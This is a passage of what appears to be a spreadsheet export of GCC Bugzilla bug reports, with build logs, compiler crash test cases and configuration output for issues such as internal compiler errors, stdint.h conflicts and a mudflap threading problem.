/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h:91:25: error: 'long long long' is too long for GCC
/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h:91:25: error: two or more data types in declaration specifiers
/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h:92:26: error: duplicate 'unsigned'
/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h:92:26: error: 'long long long' is too long for GCC
/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h:92:26: error: two or more data types in declaration specifiers
make[3]: *** [dfp.o] Error 1
make[3]: Leaving directory `/home/jayk/obj/gcc451/gcc'
make[2]: *** [all-stage1-gcc] Error 2
make[2]: Leaving directory `/home/jayk/obj/gcc451'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/jayk/obj/gcc451'
make: *** [all] Error 2
/home/jayk/lib/gcc/alphaev67-dec-osf5.1/4.5.0/include/stdint.h
/* 7.8.1.5 Greatest-width integer types */
typedef __INTMAX_TYPE__ intmax_t
typedef __UINTMAX_TYPE__ uintmax_t
I added:
#undef intmax_t
#undef uintmax_t
and then it gets further.
Not certain but problem is probably from here:
bash-4.1$ grep intmax_t */*h
gcc/auto-host.h:/* Define to 1 if the system has the type `intmax_t'. */
gcc/auto-host.h:/* Define to 1 if the system has the type `uintmax_t'. */
gcc/auto-host.h:#define intmax_t long long int
gcc/auto-host.h:#define uintmax_t unsigned long long int
bash-4.1$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/jayk/libexec/gcc/alphaev67-dec-osf5.1/4.5.0/lto-wrapper
Target: alphaev67-dec-osf5.1
Configured with: /home/jayk/src/gcc-4.5.0/configure -disable-nls -prefix=/home/jayk
Thread model: posix
gcc version 4.5.0 (GCC)
config.log:
  $ /home/jayk/src/gcc-4.5.1/configure -prefix=/home/jayk -disable-nls -verbose
Probably due to some form of autoconf compiling one way and compilation going a different way (e.g.
different command line flags).
Imho this is a major problem in autoconf. I see this kind of thing repeatedly.
Maybe it is a misuse of autoconf but it seemingly just too easy to fall into.
I also don't think this newfangled C9x stuff is worth the effort.
 Wastes too much time in autoconf'ing and misautoconf'ing it.
  See here gcc has problem using it with current gcc. (!)
Probably best to just use the first of whichever: long long __int64 long exist
erroring of long doesn't exist.
 - Jay</t>
  </si>
  <si>
    <t>GCC-45100</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault (at -O3)</t>
  </si>
  <si>
    <t>gcc version:
marco@pc-31c:~/TTT/GccTestcaseReduction&gt; gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/marco/local/gcc-4.5.0/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-threads=posix --prefix=/home/marco/local/gcc-4.5.0 --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --with-cpu=opteron --enable-languages=cc++fortran --with-mpfr=/home/marco/local/mpfr-2.4.2 --with-mpc=/home/marco/local/mpc-0.8.1 --enable-gold --enable-lto
Thread model: posix
gcc version 4.5.0 (GCC) 
------------------
How to reproduce:
gcc -O3 -c node_refine.i</t>
  </si>
  <si>
    <t>morandini</t>
  </si>
  <si>
    <t>GCC-81794</t>
  </si>
  <si>
    <t>would be stringified in traditional C warning should be controlled by -Wtraditional</t>
  </si>
  <si>
    <t>Opening a bug to track the underlying issue that caused me to submit this patch:
https://gcc.gnu.org/ml/gcc-patches/2017-05/msg00481.html
https://gcc.gnu.org/ml/gcc-patches/2017-03/msg01325.html
When compiling my fork of binutils-gdb I get a lot of warnings like this one on one file:
unwind-ia64.c:183:30: warning: macro argument code would be stringified in traditional C
 #define UNW_DEC_BAD_CODE(code)   \
                              ^
To reduce it to a testcase we can modify gcc.dg/pragma-diag-7.c to look like this:
$ cat pragma-diag-7.c
/* { dg-do compile } */
unsigned long ok = 0UL
#pragma GCC diagnostic push
#pragma GCC diagnostic warning -Wtraditional
unsigned long bad = 1UL /* { dg-warning suffix } */
/* Note the extra space before the pragma on this next line: */
 #pragma GCC diagnostic pop
unsigned long ok_again = 2UL /* { dg-bogus suffix } */
/* Redundant with the previous pop but just shows that it fails to stop the
 * following warning with an unpatched GCC: */
#pragma GCC diagnostic ignored -Wtraditional
/* { dg-bogus would be stringified .+1 } */
#define UNW_DEC_PROLOGUE(fmt body rlen arg) \
  do {									\
      unw_rlen = rlen							\
      *(int *)arg = body						\
      printf(    %s:%s(rlen=%lu)\n					\
             fmt (body ? body : prologue) (unsigned long)rlen)	\
  } while (0)
$ /usr/local/bin/gcc -c pragma-diag-7.c
pragma-diag-7.c:6:21: warning: traditional C rejects the UL suffix [-Wtraditional]
 unsigned long bad = 1UL /* { dg-warning suffix } */
                     ^~~
pragma-diag-7.c:16:46: warning: macro argument rlen would be stringified in traditional C
 #define UNW_DEC_PROLOGUE(fmt body rlen arg) \
                                              ^
pragma-diag-7.c:16:46: warning: macro argument body would be stringified in traditional C
$ 
To get rid of the unwanted warnings all that is necessary is a 1-line patch to libcpp/macro.c to change a call to cpp_error with CPP_DL_WARNING into a call to cpp_warning with CPP_W_TRADITIONAL instead. The patch is already linked above.</t>
  </si>
  <si>
    <t>egallager</t>
  </si>
  <si>
    <t>GCC-54651</t>
  </si>
  <si>
    <t>Bugzilla sending broken emails</t>
  </si>
  <si>
    <t>Hello
all emails I have received from bugzilla these last 2-3 days were broken. The headers ended up as part of the body of the email. For some reason the mailman archives on the web are not affected but I have seen other people quote those headers in their replies so I am not the only one. I'd suspect a CR/LF-related issue but who knows...
Example of email body:
Date: Fri 21 Sep 2012 09:19:47 +0000
X-Bugzilla-Reason: Reporter
X-Bugzilla-Type: changed
X-Bugzilla-Watch-Reason: None
X-Bugzilla-Product: gcc
X-Bugzilla-Component: c++
X-Bugzilla-Keywords: 
X-Bugzilla-Severity: normal
X-Bugzilla-Who: glisse at gcc dot gnu.org
X-Bugzilla-Status: NEW
X-Bugzilla-Priority: P3
X-Bugzilla-Assigned-To: unassigned at gcc dot gnu.org
X-Bugzilla-Target-Milestone: ---
X-Bugzilla-Changed-Fields: 
Message-ID: 
In-Reply-To: 
References: 
X-Bugzilla-URL: http://gcc.gnu.org/bugzilla/
Auto-Submitted: auto-generated
Content-Type: text/plain charset=UTF-8
MIME-Version: 1.0
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=54427
--- Comment #7 from Marc Glisse  2012-09-21
[etc]</t>
  </si>
  <si>
    <t>GCC-50092</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: in elimination_costs_in_insn at reload1.c:3633</t>
  </si>
  <si>
    <t>Created attachment 25018
preprocessed source
Description of problem:
Error declaring a big vector by value of datatype complex long double and long double.
I'm using the library complex.h
If I do the same with malloc there's no problem with memory allocation.
Version-Release number of selected component (if applicable):
Using built-in specs.
COLLECT_GCC=gcc-4.6.1
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.6.1/work/gcc-4.6.1/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.1 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/python --enable-checking=release --disable-libgcj --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.6.1 p1.0 pie-0.4.5'
Thread model: posix
gcc version 4.6.1 (Gentoo 4.6.1 p1.0 pie-0.4.5)
How reproducible:
Steps to Reproduce:
1. Compile the source file with gcc-4.6.1 -Wall test.c -o test
Actual results:
test.c: In function 'main':
test.c:21:1: internal compiler error: in elimination_costs_in_insn at reload1.c:3633
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Expected results:
With malloc:
Valor: 0.671913
Valor: 0.580317
Valor: 0.235468
Valor: 0.285724
Valor: 0.198874
Valor: 0.445921
Valor: 0.102851
Valor: 0.881226
Valor: 0.080384
Valor: 0.988736
La posicion 5 tiene el valor: 3.115597e-01
With gcc4.1: Segmentation Fault (Logically this result is espected)
Additional info:
I'm running a Gentoo:
Linux version 2.6.39-gentoo-r3 (root@gentoo) (gcc version 4.4.5 (Gentoo 4.4.5 p1.2 pie-0.4.5) ) #4 SMP Tue Jul 19 01:03:04 Local time zone must be set--see zic 
I became a similar error reported to redhat with gcc 4.4 Bug 730382</t>
  </si>
  <si>
    <t>mario.trangoni</t>
  </si>
  <si>
    <t>GCC-54663</t>
  </si>
  <si>
    <t>microblaze-linux genchecksum failure: opening microblaze-c.o: No such file or directory</t>
  </si>
  <si>
    <t>ar rc libbackend.a insn-attrtab.o insn-automata.o insn-dfatab.o insn-emit.o insn-extract.o insn-latencytab.o insn-modes.o insn-opinit.o insn-output.o insn-peep.o insn-preds.o insn-recog.o insn-enums.o ggc-page.o alias.o alloc-pool.o auto-inc-dec.o bb-reorder.o bitmap.o bt-load.o builtins.o caller-save.o calls.o cfg.o cfganal.o cfgbuild.o cfgcleanup.o cfgexpand.o cfghooks.o cfgloop.o cfgloopanal.o cfgloopmanip.o cfgrtl.o symtab.o cgraph.o cgraphbuild.o cgraphunit.o cgraphclones.o combine.o combine-stack-adj.o compare-elim.o convert.o coverage.o cppbuiltin.o cppdefault.o cprop.o cse.o cselib.o data-streamer.o data-streamer-in.o data-streamer-out.o dbxout.o dbgcnt.o dce.o ddg.o debug.o df-core.o df-problems.o df-scan.o dfp.o dojump.o dominance.o domwalk.o double-int.o dse.o dwarf2asm.o dwarf2cfi.o dwarf2out.o ebitmap.o emit-rtl.o et-forest.o except.o explow.o expmed.o expr.o final.o fixed-value.o fold-const.o function.o fwprop.o gcse.o ggc-common.o gimple.o gimple-iterator.o gimple-fold.o gimple-low.o gimple-pretty-print.o gimple-ssa-strength-reduction.o gimple-streamer-in.o gimple-streamer-out.o gimplify.o godump.o graph.o graphds.o graphite.o graphite-blocking.o graphite-clast-to-gimple.o graphite-dependences.o graphite-interchange.o graphite-optimize-isl.o graphite-poly.o graphite-scop-detection.o graphite-sese-to-poly.o gtype-desc.o haifa-sched.o hw-doloop.o hwint.o ifcvt.o ree.o incpath.o init-regs.o internal-fn.o ipa-cp.o ipa-split.o ipa-inline.o ipa-inline-analysis.o ipa-inline-transform.o ipa-prop.o ipa-pure-const.o ipa-reference.o ipa-ref.o ipa-utils.o ipa.o ira.o ira-build.o ira-costs.o ira-conflicts.o ira-color.o ira-emit.o ira-lives.o jump.o langhooks.o lcm.o lists.o loop-doloop.o loop-init.o loop-invariant.o loop-iv.o loop-unroll.o loop-unswitch.o lower-subreg.o lto-cgraph.o lto-streamer.o lto-streamer-in.o lto-streamer-out.o lto-section-in.o lto-section-out.o lto-symtab.o lto-opts.o lto-compress.o mcf.o mode-switching.o modulo-sched.o omega.o omp-low.o optabs.o options-save.o opts-global.o passes.o plugin.o pointer-set.o postreload-gcse.o postreload.o predict.o print-rtl.o print-tree.o profile.o real.o realmpfr.o recog.o reg-stack.o regcprop.o reginfo.o regmove.o regrename.o regstat.o reload.o reload1.o reorg.o resource.o rtl-error.o rtl.o rtlanal.o rtlhooks.o sbitmap.o sched-deps.o sched-ebb.o sched-rgn.o sched-vis.o sdbout.o sel-sched-ir.o sel-sched-dump.o sel-sched.o sese.o simplify-rtx.o sparseset.o sreal.o stack-ptr-mod.o statistics.o stmt.o stor-layout.o store-motion.o streamer-hooks.o stringpool.o target-globals.o targhooks.o timevar.o toplev.o tracer.o trans-mem.o tree-affine.o tree-call-cdce.o tree-cfg.o tree-cfgcleanup.o tree-chrec.o tree-complex.o tree-data-ref.o tree-dfa.o tree-diagnostic.o tree-dump.o tree-eh.o tree-emutls.o tree-if-conv.o tree-inline.o tree-into-ssa.o tree-iterator.o tree-loop-distribution.o tree-nested.o tree-nomudflap.o tree-nrv.o tree-object-size.o tree-optimize.o tree-outof-ssa.o tree-parloops.o tree-phinodes.o tree-predcom.o tree-pretty-print.o tree-profile.o tree-scalar-evolution.o tree-sra.o tree-switch-conversion.o tree-ssa-address.o tree-ssa-alias.o tree-ssa-ccp.o tree-ssa-coalesce.o tree-ssa-copy.o tree-ssa-copyrename.o tree-ssa-dce.o tree-ssa-dom.o tree-ssa-dse.o tree-ssa-forwprop.o tree-ssa-ifcombine.o tree-ssa-live.o tree-ssa-loop-ch.o tree-ssa-loop-im.o tree-ssa-loop-ivcanon.o tree-ssa-loop-ivopts.o tree-ssa-loop-manip.o tree-ssa-loop-niter.o tree-ssa-loop-prefetch.o tree-ssa-loop-unswitch.o tree-ssa-loop.o tree-ssa-math-opts.o tree-ssa-operands.o tree-ssa-phiopt.o tree-ssa-phiprop.o tree-ssa-pre.o tree-ssa-propagate.o tree-ssa-reassoc.o tree-ssa-sccvn.o tree-ssa-sink.o tree-ssa-strlen.o tree-ssa-structalias.o tree-ssa-tail-merge.o tree-ssa-ter.o tree-ssa-threadedge.o tree-ssa-threadupdate.o tree-ssa-uncprop.o tree-ssa-uninit.o tree-ssa.o tree-ssanames.o tree-stdarg.o tree-streamer.o tree-streamer-in.o tree-streamer-out.o tree-tailcall.o tree-vect-generic.o tree-vect-patterns.o tree-vect-data-refs.o tree-vect-stmts.o tree-vect-loop.o tree-vect-loop-manip.o tree-vect-slp.o tree-vectorizer.o tree-vrp.o tree.o valtrack.o value-prof.o var-tracking.o varasm.o varpool.o vmsdbgout.o web.o xcoffout.o microblaze.o  host-linux.o
ranlib  libbackend.a
rm -rf libcommon-target.a
ar rc libcommon-target.a microblaze-common.o prefix.o params.o opts.o opts-common.o options.o vec.o hooks.o common/common-targhooks.o hash-table.o
ranlib  libcommon-target.a
rm -rf libcommon.a
ar rc libcommon.a diagnostic.o pretty-print.o intl.o input.o version.o
ranlib  libcommon.a
build/genchecksum c/c-lang.o c-family/stub-objc.o attribs.o c/c-errors.o c/c-decl.o c/c-typeck.o c/c-convert.o c/c-aux-info.o c/c-objc-common.o c/c-parser.o c-family/c-common.o c-family/c-cppbuiltin.o c-family/c-dump.o c-family/c-format.o c-family/c-gimplify.o c-family/c-lex.o c-family/c-omp.o c-family/c-opts.o c-family/c-pch.o c-family/c-ppoutput.o c-family/c-pragma.o c-family/c-pretty-print.o c-family/c-semantics.o c-family/c-ada-spec.o tree-mudflap.o microblaze-c.o default-c.o libbackend.a main.o tree-browser.o libcommon-target.a libcommon.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a libcommon.a ../libcpp/libcpp.a ../libiberty/libiberty.a   ../libdecnumber/libdecnumber.a \
                     checksum-options &gt; cc1-checksum.c.tmp &amp;&amp;            \
../../../gcc/gcc/../move-if-change cc1-checksum.c.tmp cc1-checksum.c
opening microblaze-c.o: No such file or directory
make[2]: *** [cc1-checksum.c] Error 1
rm gcov.pod gcc.pod cpp.pod fsf-funding.pod gccgo.pod gfortran.pod gfdl.pod
make[2]: Leaving directory `/home/amylaar/fsf/multi/microblaze-linux/gcc'
make[1]: *** [all-gcc] Error 2</t>
  </si>
  <si>
    <t>GCC-79060</t>
  </si>
  <si>
    <t>gfortran ICE with deferred-length character component initialization</t>
  </si>
  <si>
    <t>Test program is:
program test
type my_type
  character(:) allocatable :: c
end type
type (my_type) var
var = my_type()
end program
Compiler:
mc66:~/Bmad/test&gt; gcc --version
gcc (MacPorts gcc5 5.4.0_0) 5.4.0
Compiling gives:
mc66:~/Bmad/test&gt; gfortran test.f90
test.f90:9:0:
 var = my_type()
 1
internal compiler error: in alloc_scalar_allocatable_for_subcomponent_assignment at fortran/trans-expr.c:6842
test.f90:9:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
Note: No bug with gcc 6.3.0</t>
  </si>
  <si>
    <t>GCC-45581</t>
  </si>
  <si>
    <t>Hi the attached file testcase-src-15.cxx contains a testcase which makes the compiler segfault:
amber2::wilx:~/tmp/log4cplus-svn/objdir/src/testcase&gt; g++ -O3 -fkeep-inline-functions -c testcase-src-15.cxx
testcase-src-15.cxx: In member function â€˜void PropertyConfigurator::replaceEnvironVariables()â€™:
testcase-src-15.cxx:60:30: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Removing either -O3 or -fkeep-inline-functions removes the segfault.
amber2::wilx:~/tmp/log4cplus-svn/objdir/src/testcase&gt; g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-pc-cygwin/4.5.0/lto-wrapper.exe
Target: i686-pc-cygwin
Configured with: /gnu/gcc/releases/respins/4.5.0-1/gcc4-4.5.0-1/src/gcc-4.5.0/configure --srcdir=/gnu/gcc/releases/respins/4.5.0-1/gcc4-4.5.0-1/src/gcc-4.5.0 --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --datadir=/usr/share --localstatedir=/var --sysconfdir=/etc --datarootdir=/usr/share --docdir=/usr/share/doc/gcc4 --datadir=/usr/share --infodir=/usr/share/info --mandir=/usr/share/man -v --with-gmp=/usr --with-mpfr=/usr --enable-bootstrap --enable-version-specific-runtime-libs --libexecdir=/usr/lib --enable-static --enable-shared --enable-shared-libgcc --disable-__cxa_atexit --with-gnu-ld --with-gnu-as --with-dwarf2 --disable-sjlj-exceptions --enable-languages=adacc++fortranjavaltoobjcobj-c++ --enable-graphite --enable-lto --enable-java-awt=gtk --disable-symvers --enable-libjava --program-suffix=-4 --enable-libgomp --enable-libssp --enable-libada --enable-threads=posix --with-arch=i686 --with-tune=generic --enable-libgcj-sublibs CC=gcc-4 CXX=g++-4 CC_FOR_TARGET=gcc-4 CXX_FOR_TARGET=g++-4 GNATMAKE_FOR_TARGET=gnatmake GNATBIND_FOR_TARGET=gnatbind --with-ecj-jar=/usr/share/java/ecj.jar
Thread model: posix
gcc version 4.5.0 (GCC)</t>
  </si>
  <si>
    <t>vhaisman</t>
  </si>
  <si>
    <t>GCC-55411</t>
  </si>
  <si>
    <t>OMP threads lose their OMP_WAIT_POLICY when another OMP thread gets destructed</t>
  </si>
  <si>
    <t>So there are 2 bugs:
 * the omp workers of a boost::thread are ignoring OMP_WAIT_POLICY
 * once the boost::thread gets destructed the main-thread's omp worker's WAIT_POLICY get lost
used to compile the example:
g++ -fopenmp -lgomp -lboost_system -lboost_thread-mt -o foo.bin -O2 foo_omp.c
tested with gentoo:
Just run the example with `export OMP_WAIT_POLICY=ACTIVE` and watch it in another window with htop. First all created omp threads use 100% then the boost::thread and its omp workers are spawned (all with ~0% cpu usage still the main-thread's omp workers use 100%). Then the boost::thread gets destructed and the main-threads omp workers fallback to 0% cpu usage.
PS: It would be nice if there was a GOMP_DEBUG to enable a more verbose output esp. to debug GOMP_SPINCOUNT &amp; OMP_PROC_BIND.</t>
  </si>
  <si>
    <t>jk3064</t>
  </si>
  <si>
    <t>GCC-2018</t>
  </si>
  <si>
    <t>Sqrt causes ice in emit_move_insn at expr.c:2718</t>
  </si>
  <si>
    <t>The following simple code tbug.f triggers an internal compiler error. The
call of the function sqrt causes the error.
Release:
2.97 20010216 (experimental)
Environment:
System: Linux kiste 2.4.1 #33 Thu Feb 15 12:51:39 CET 2001 i686 unknown
Architecture: i686
SuSE-7.1
Glibc-2.2
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix
How-To-Repeat:
source tbug.f
      function f(c)
      implicit none
      real*8 c f
      f = sqrt(c)
      return
      end
Compiling tbug.f
g77 -v -c tbug.f -W -Wall -Q
g77 version 2.97 20010216 (experimental) (Fortran Frontend version 0.5.26 20010216 (experimental))
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix
gcc version 2.97 20010216 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/f771 tbug.f -dumpbase tbug.f -W -Wall -version -o /tmp/cciqaby5.s
GNU F77 version 2.97 20010216 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010216 (experimental).
options passed:  -W -Wall
options enabled:  -fmove-all-movables -freduce-all-givs -fpeephole
 -ffunction-cse -fkeep-static-consts -fpcc-struct-return -fsched-interblock
 -fsched-spec -fbranch-count-reg -fnew-exceptions -fcommon -fgnu-linker
 -fargument-noalias-global -fident -m80387 -mhard-float -mno-soft-float
 -mieee-fp -mfp-ret-in-387
 f_tbug.f: In function `f':
tbug.f:4: Internal compiler error in emit_move_insn at expr.c:2718
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-17466</t>
  </si>
  <si>
    <t>Testsuites in gcc override LD_LIBRARY_PATH</t>
  </si>
  <si>
    <t>Testsuites in gcc override LD_LIBRARY_PATH by using the global
ld_library_path which causes LD_LIBRARY_PATH to be set as
$ld_library_path and/or setting it directly.</t>
  </si>
  <si>
    <t>GCC-50052</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] FAIL: gcc.dg/ipa/ipa-sra-2.c scan-tree-dump eipa_sra</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir-test/gcc/xgcc -B/mnt/gnu/gcc/objdir-test/gcc/ /mnt/gnu/gcc/gcc/gcc/testsuite/gcc.dg/ipa/ipa-sra-2.c   -O2 -fipa-sra -fdum
p-tree-eipa_sra-details -S  -o ipa-sra-2.s    (timeout = 300)PASS: gcc.dg/ipa/ipa-sra-2.c (test for excess errors)FAIL: gcc.dg/ipa/ipa-sra-2.c scan-tree-dump eipa_sra About to replace expr cow_
.*D.-&gt;red with \*ISRA
FAIL: gcc.dg/ipa/ipa-sra-2.c scan-tree-dump eipa_sra About to replace expr cow_
.*D.-&gt;green with ISRA
FAIL: gcc.dg/ipa/ipa-sra-2.c scan-tree-dump eipa_sra About to replace expr calf_.*D.-&gt;red with \*ISRAFAIL: gcc.dg/ipa/ipa-sra-2.c scan-tree-dump eipa_sra About to replace expr calf
_.*D.-&gt;green with ISRA
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/nowhere --with-gmp=/opt/gnu/gcc/gmp --enable-threads=posix --enable-debug=no --disable-nls --disable-lto --without-cloog --without-ppl --enable-checking=release --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.6.2 20110810 (prerelease) [gcc-4_6-branch revision 177627] (GCC) 
Similar fail is:
Executing on host: /mnt/gnu/gcc/objdir-test/gcc/xgcc -B/mnt/gnu/gcc/objdir-test/
gcc/ /mnt/gnu/gcc/gcc/gcc/testsuite/gcc.dg/ipa/ipa-sra-6.c   -O2 -fipa-sra -fdum
p-tree-eipa_sra-slim -S  -o ipa-sra-6.s    (timeout = 300)
PASS: gcc.dg/ipa/ipa-sra-6.c (test for excess errors)
FAIL: gcc.dg/ipa/ipa-sra-6.c scan-tree-dump-times eipa_sra foo  1</t>
  </si>
  <si>
    <t>GCC-8225</t>
  </si>
  <si>
    <t>g++ 3.2.1 internal error on (probably invalid) STL-using code</t>
  </si>
  <si>
    <t xml:space="preserve">It's ICE on libstdc++-using code that's invalid AFAIK:
std::sort (something.begin () something.end () std::less)
Obviously I'm not trying to compile invalid code.  I got here trying to
compile a similar code.   And that may be g++ error as well:
class my_less
std::sort (something.begin () something.end () my_less)
gives parse error before `)' token but I think the code is valid.
The same trouble I have with g++ 3.0.4.
Release:
3.2.1 20020924 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux silke 2.4.19 #1 Mon Sep 30 14:04:39 CEST 2002 i686 unknown unknown GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: /mnt/data/gcc-3.1/gcc-3.2-3.2.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
The ICE hits on line 22117 of following preprocessed c++ code.  I'm sorry
it's so big (about 80 kB gzipped).
See attachments for bad.i.gz
</t>
  </si>
  <si>
    <t>egon</t>
  </si>
  <si>
    <t>GCC-60980</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE in build_special_member_call at cp/call.c:7447</t>
  </si>
  <si>
    <t>Test case:
struct x0
{
    x0 () = default
}
struct x1
{
    x0 x2[]
    void x3 ()
    {
        x1 ()
    }
}
Using trunk @r209848 (2014-04-27 17:18:40 -0700 (Sun 27 Apr 2014)):
g++ -c -std=c++11 -c t.ii
t.ii: In member function â€˜void x1::x3()â€™:
t.ii:10:13: internal compiler error: tree check: expected record_type or union_type or qual_union_type have array_type in build_special_member_call at cp/call.c:7447
         x1 ()
             ^
0xd6cad4 tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/tree.c:9180
0x55d587 tree_check3
	../../gcc/tree.h:2761
0x55d587 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
	../../gcc/cp/call.c:7447
0x6b5597 build_value_init(tree_node* int)
	../../gcc/cp/init.c:348
0x6b5179 build_value_init_noctor(tree_node* int)
	../../gcc/cp/init.c:419
0x6b560c build_value_init(tree_node* int)
	../../gcc/cp/init.c:367
0x5fd734 build_functional_cast(tree_node* tree_node* int)
	../../gcc/cp/typeck2.c:1898
0x6656a0 cp_parser_functional_cast
	../../gcc/cp/parser.c:23323
0x65ed42 cp_parser_postfix_expression
	../../gcc/cp/parser.c:5900
0x662193 cp_parser_unary_expression
	../../gcc/cp/parser.c:7188
0x662e7f cp_parser_binary_expression
	../../gcc/cp/parser.c:7893
0x663361 cp_parser_assignment_expression
	../../gcc/cp/parser.c:8131
0x6658c3 cp_parser_expression
	../../gcc/cp/parser.c:8293
0x6660ec cp_parser_expression
	../../gcc/cp/parser.c:8332
0x6660ec cp_parser_expression_statement
	../../gcc/cp/parser.c:9651
0x65afc8 cp_parser_statement
	../../gcc/cp/parser.c:9502
0x65bdf9 cp_parser_statement_seq_opt
	../../gcc/cp/parser.c:9774
0x65bf66 cp_parser_compound_statement
	../../gcc/cp/parser.c:9728
0x66d14b cp_parser_function_body
	../../gcc/cp/parser.c:18755
0x66d14b cp_parser_ctor_initializer_opt_and_function_body
	../../gcc/cp/parser.c:18791
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.</t>
  </si>
  <si>
    <t>GCC-26864</t>
  </si>
  <si>
    <t>multithreaded mudflap not working</t>
  </si>
  <si>
    <t>gcc version: 
gcc (GCC) 4.0.2 20051125 (Red Hat 4.0.2-8)
Sample program t1.c:
int main()
{
   int a[3] = { 1 2 3 }
   return a[3]
}
When I compile this with mudflap it correctly reports an error:
$ gcc -fmudflap t1.c -lmudflap
$ a.out
*******
mudflap violation 1 (check/read): time=1143264091.275264 ptr=0xbf97b680 size=16
pc=0x5e8373 location=`s3.c:4 (main)'
      /usr/lib/libmudflap.so.0(__mf_check+0x44) [0x5e8373]
      a.out(main+0xa1) [0x8048751]
      /usr/lib/libmudflap.so.0(__wrap_main+0x1d8) [0x5e90be]
Nearby object 1: checked region begins 0B into and ends 4B after
mudflap object 0x8712380: name=`s3.c:3 (main) a'
bounds=[0xbf97b6800xbf97b68b] size=12 area=stack check=3r/0w liveness=3
alloc time=1143264091.275229 pc=0x5e8e7a
number of nearby objects: 1
The manual recommends using -fmudflapth for multithreaded programs.  One thing in the man page/online manual that is not clear is whether to link with libmudflap or libmudflapth for multithreaded program.  Both libraries exist but only libmudflap is mentioned in the manual.  This should be clarified.
In any case when I link with either -lmudflap or -lmudflapth and compile with -fmudflapth a.out gives no output at all.
$ gcc -pthread -fmudflapth t1.c -lmudflapth
[ omitted irrelevant warnings about deprecated pthread_attr_getstackaddr ]
$ a.out
[ no output at all ]
$ gcc -pthread -fmudflapth t1.c -lmudflap
[ same ]
$ a.out
[ no output ]</t>
  </si>
  <si>
    <t>pr2345</t>
  </si>
  <si>
    <t>GCC-51681</t>
  </si>
  <si>
    <t>[4.7 Regression]: ICE in gcc.dg/torture/vshuf-v2si.c on ia64</t>
  </si>
  <si>
    <t>Also crashes in crosscompiler:
~/gcc-build-xxx/gcc/cc1 -O2 -quiet vshuf-v2si.c 
In file included from vshuf-v2si.c:17:0:
vshuf-main.inc: In function â€˜test_12â€™:
